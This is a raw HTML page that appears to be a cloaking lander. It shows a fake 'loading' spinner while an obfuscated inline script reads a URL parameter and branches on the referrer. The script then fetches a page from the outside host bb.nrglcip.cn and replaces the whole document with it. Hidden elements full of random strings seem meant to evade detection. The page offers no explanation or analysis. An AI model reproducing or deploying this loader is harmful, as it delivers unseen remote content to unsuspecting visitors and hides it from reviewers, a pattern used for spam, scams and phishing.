<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .J6WQQeU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .J6WQQeU .vcH3tV1EXT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .J6WQQeU .content {
            line-height: 50px;
            text-align: center
        }

        .J6WQQeU .img {
            width: 100%
        }

        .J6WQQeU .I0eyZe1YoE {
            text-align: center
        }

        .J6WQQeU .I0eyZe1YoE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .J6WQQeU .I0eyZe1YoE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .J6WQQeU .I0eyZe1YoE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .J6WQQeU .I0eyZe1YoE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .J6WQQeU .I0eyZe1YoE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .J6WQQeU .I0eyZe1YoE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .J6WQQeU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function suiNnd2JfHduY(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Qy5PZ = suiNnd2JfHduY('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Qy5PZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Qy5PZ +".html?a=share";
		}
		
        eHqXenmxI=url+"#"+new Date().getTime();
        eHqXenmxI && function() {
            $.get(eHqXenmxI, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>Q4AADHFPb6E3p9E</p>
<b style='display:none' >oibIJjswEKvCKq8SxPlZzG2X1mKi7TDIc7HzGLQNYLPz</b>
<a  href='#' style='display:none'>p2MCDuuQUTV6qySFwglb37fdpx1wHaeGIM9z</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'><div class="J6WQQeU">
    <div class="vcH3tV1EXT">
        <div class="I0eyZe1YoE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >cIbR5F8azXl5zjLFwroFrwFZeZoTYIolUarOdiW5Yksc5qh4DrCpV5S9YUl</h1>
<h1 style='display:none' >cIbR5F8azXl5zjLFwroFrwFZeZoTYIolUarOdiW5Yksc5qh4DrCpV5S9YUl</h1>
<p  style='display:none'>aPmTR6PExcElkrHtuluqqXz4XZgHbXRYikczjpE4nItDDTN8EDoplurAeDDYfA</p>
<span style='display:none'>rYHRoKmM7nUQPQYGT5KToVSXk3WB59QWQOHFw8zOjggPgy4I1JMBDukqLJUoglkryRShr3fKBPAFBmGIvVZFCzKkgGvFjaWJ</span>
<b style='display:none' >qJnFktz4Hdlev8hem8mytLXJEye2udP0KQgBGeiXmTT2S9k6kwUV58070uQGPSzlCqFOL6gi</b>
<span style='display:none'>rYHRoKmM7nUQPQYGT5KToVSXk3WB59QWQOHFw8zOjggPgy4I1JMBDukqLJUoglkryRShr3fKBPAFBmGIvVZFCzKkgGvFjaWJ</span></body>
</html>